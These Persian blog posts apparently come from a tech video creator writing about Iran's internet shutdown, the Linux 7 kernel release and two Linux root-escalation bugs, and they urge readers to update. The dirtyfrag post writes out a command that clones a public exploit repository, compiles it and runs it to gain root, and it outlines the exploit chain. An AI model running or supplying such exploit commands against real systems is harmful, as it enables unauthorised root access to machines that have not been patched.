خب به نظر می رسه تعداد بیشتری از آدم ها در ایران امروز به اینترنت رسیدن. هم قیمت وی پی ان های مبتنی بر استارلینک تا حدی پایینتر اومده و هم چند تا رنج آی پی جدید باز شده (که حدس می زن مرتبط باشه با اینترنت دادن به خودی هاشون) و هم تونل های SNI دارن بیشتر استفاده می شن. بازم به امید روزی که این حرف ها رو اصلا نفهمیم و اینترنت برامون یه چیزی باشه که با وصل شدن به وای فای یا روشن کردن ۵جی راه می افته و اکثریت ایرانی ها نه لازمه بدونن دی ان اس چیه نه اسپوفینگ.

اگر می خواین سعی کنین برای اطرافیان راه بندازین،
SNI-Spoofing
و ده ها پروژه ای که روی گیت هاب هست رو سرچ کنین. متاسفانه (و همزمان خوشبختانه) به خاطر هوش مصنوعی دیگه معلوم نیست کد اصلی کدوم بوده و اینها و همه رو هم سوار می شن و تند تند کد و اسکریپت میاد که منم نمی دونم الان دقیقا کدومش راحتترین است. ولی تست کردنش سخت نیست.

و تکرار می کنم که این راه حل ها موقت و محدود است. روش عمومی ای نیست که همه باهاش وصل بشیم. با دردسر چند نفری رو می تونین وصل کنین باهاش.

روزهای بدی است ولی باید تلاش کرد و پیش رفت. راستش اخبار به شیوه کلاسیک رادیو جادی به نظرم بی معنی میاد چون اکثر مخاطبین که تو ایران هستن بهش نمی رسن و وقتی هم برسن خبر قدیمی دیدن خیلی جالب نیست و دیدن اینکه اومده ولی نمی تونن ببینن هم رنج رو بیشتر می کنه.

در نتیجه سعی می کنم چیزهایی درست کنم که زمان مشخصی ندارن و هر وقت کسی به اینترنت رسید بتونه نگاهش کنه و «دیر» نشده باشه چندان؛ حتی اگر در مورد اخبار روز باشه.

توی این ویدئو در مورد لینوکس کرنل جدید حرف می زنیم که عدد اصلی نسخه اش عوض شده. یکی دو روز قبل لینوکس نسخه ۷ ریلیز شد که خب از نظر عددی اتفاق بزرگی است. بیاین ببینیم توش چی داره و بعدش کامپایلش کنیم و روی توزیعمون نصبش کنیم و آزادی رو آرزو کنیم.

برای کسانی که نمی تونن ببینین بگم که دو سه تا چیز در این هسته جدید جذابتره:

- یه الگوریتم مقاوم در برابر کوانتوم که قراره کم کم برای امضای ماجولها جایگزین الگوریتم های قبلی بشه
- بیرون اومدن راست از وضعیت آزمایشی و پایدار شدنش در هسته برای توسعه ماجولها و بخش های دیگه
- پیشرفت ها توی BFP بخصوص توی io_uring . این روزها BFP روشی مدرن است برای دیباگ کردن کرنل، دیدن اجرای برنامه ها، بررسی بدافزارها و کلی چیز دیگه

https://youtu.be/n_OGYdpKZbo

دو قسمت کوتاه دیگه از #برای_پیروزی . نگاهی می ندازیم به وضعیت لئونارد مشهور به وی-دونگ و خواهربزرگ نور و دوستاش. سریع و موثر (:

با ذکر بد بودن اینترنت طبقاتی و سانسور و جنگ و ابراز امید برای رسیدن به آزادی و حق انتخاب و مشارکت مردم در سرنوشت، باید بگم که مطلقا هر لینوکسی که دارین رو آپدیت کنین. با این copy.fail می شه روی بسیاری از لینوکس های آپدیت نشده، با یوزر لوکال دسترسی روت گرفت.

این مساله کپی فیل اینقدر مهم بود که فکر کردم سعی کنم کاملا فنی توضیحش بدم. ویدئو سه تا مفهومی که باعث شدن در ترکیبشون بشه یه یوزر معمولی دسترسی روت بگیره رو توضیح می ده. جالبیش هم اینه که هر سه تا مفهوم، منطقی و معقول هستن ولی ترکیبشون باعث شده بشه چنین حمله ای درست کرد!

https://youtu.be/0GUEoWEDqlo

یه ویدئو گذاشتم و استقبال اینقدر زیاد بود که بر داشتم (: دلیلش این بود که می تونه موجب بسته شدنش بشه یکهو هزار تا فورک و اجرا کردن کد اسپیس. من معمولا به همین خاطر خیلی مستقیم اینجا روشی رو معرفی نمی کنم که ظاهرا استراتژی معقولی بوده. حالا یه فکری می کنم که به کسانی که نرسیده خرد خرد برسه.

و عمیقا به امید روزی که اینهمه آدم معطل این نباشیم که چطوری باید به اینترنتی برسیم که تو دنیای معقول، هر کس از خواب بیدار می شه بی دردسر بهش دسترسی داره.

دوباره یه مشکل امنیتی حاد در کرنل لینوکس داریم که باهاش هر یوزر لوکال می تونه دسترسی روت بگیره. بهش می گن درتی فرگ.

رپوزیتوری اینجاست:‌
https://github.com/V4bel/dirtyfrag
و دستوری که دسترسی می ده اینه:
git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

که مشخصه یه فایل رو میگیره و کامپایل و اجرا می کنه. این فایل سی، توی یه زنجیره پیش می ره: فایل سو رو لود می کنه، یه پایپ درست می کنه، هر دو رو توی یک فرگمنت از یه پیج نگه می داره و بعد دسترسی نوشتن میگیره و تغییرش می ده و بعد دیگه می شه اجراش کرد.

توی این ویدئو تا حد معقولی با نگاه به کدهای کرنل توضیحش می دم:
https://youtu.be/DbXWIYpxCVE

آپدیت کنین و تکرار کنین که قطع اینترنت چند تا سرور و کامپیوتر شخصی رو در کشور رو ناامن نگه خواهد داشت.

#لینوکس #امنیت